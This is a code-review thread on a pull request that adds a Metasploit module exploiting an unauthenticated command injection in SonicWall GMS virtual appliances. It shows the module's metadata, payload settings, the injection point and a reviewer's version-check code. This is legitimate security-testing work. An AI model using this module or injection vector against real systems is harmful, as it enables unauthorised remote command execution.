modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb

```diff
@@ -0,0 +1,136 @@
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => "SonicWall Global Management System Virtual Appliance
+                 DispatcherHandler set_time_zone Unauthenticated
+                 Remote Command Injection Vulnerability",
+      'Description' => %q{
+        This module exploits a vulnerability in SonicWall Global
+        Management System Virtual Appliance versions 8.1 (Build 8110.1197)
+        and below. This virtual appliance can be downloaded from
+        http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a
+        holistic way to manage your entire network security environment.'
+
+        These vulnerable versions (8.1 Build 8110.1197 and below) do not
+        prevent unauthenticated, external entities from making XML-RPC
+        requests to port 21009 of the virtual app. After the XML-RPC call
+        is made, a shell script is called like so:
+        'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Michael Flanders', #MSF Module
+                    'kernelsmith' #Advisor
+                  ],
+      'References' => [
+        ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
+        ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
+      ],
+      'Platform' => [ 'unix' ],
+      'Arch' => ARCH_CMD,
+      'Targets' => [
+        [ 'SonicWall Global Management System Virtual Appliance', {} ],
+      ],
+      'Payload' => {
+        # Can't use ampersand, Java's XML-RPC parser will complain and return an error
+        'BadChars' => "\x26",
+         'Compat' => {
+           'PayloadType' => 'cmd',
+           'RequiredCmd' => 'generic bash telnet'
+         }
+      },
+      'DisclosureDate' => "Jul 22 2016",
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
+                                             Defaults to 80/443 depending on SSL.'])
+        ], self.class
+      )
+  end
+
+  def check
```

Comment:
`CheckCode::Appears` is preferred over `CheckCode::Vulnerable` in instances where the vulnerability is inferred through a version check.

Also, `CheckCode::Unknown` is generally reserved for instances where something went horribly wrong, like a network connection failure.

Also, `Exploit::` class prefix for `CheckCode` is redundant in this context.

Golfed your code for readability:

```ruby
  def check
    if datastore['WEB_SERVER_PORT']
      port_number = datastore['WEB_SERVER_PORT']
    else
      port_number = datastore['SSL'] ? '443' : '80'
    end

    handler = datastore['SSL'] ? 'https' : 'http'

    res = request_url("#{handler}://#{datastore['RHOST']}:#{port_number}")

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/
      return CheckCode::Safe
    end

    maj_ver, min_ver = $1.split('.').map { |x| x.to_i }
    if maj_ver <= 7
      return CheckCode::Appears
    end
    if maj_ver >= 8 && min_ver <= 1
      return CheckCode::Appears
    end

    CheckCode::Safe
  end
```

This code could be cleaned up a bit further. You may be interested in `Gem::Version` which magically takes care of version comparisons for you. Here's an [example](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/quest_kace_systems_management_rce.rb#L86).

Reply:
Golfed as suggested & added Gem::Version for version checking. I tested the new version checking against vuln && non-vuln versions.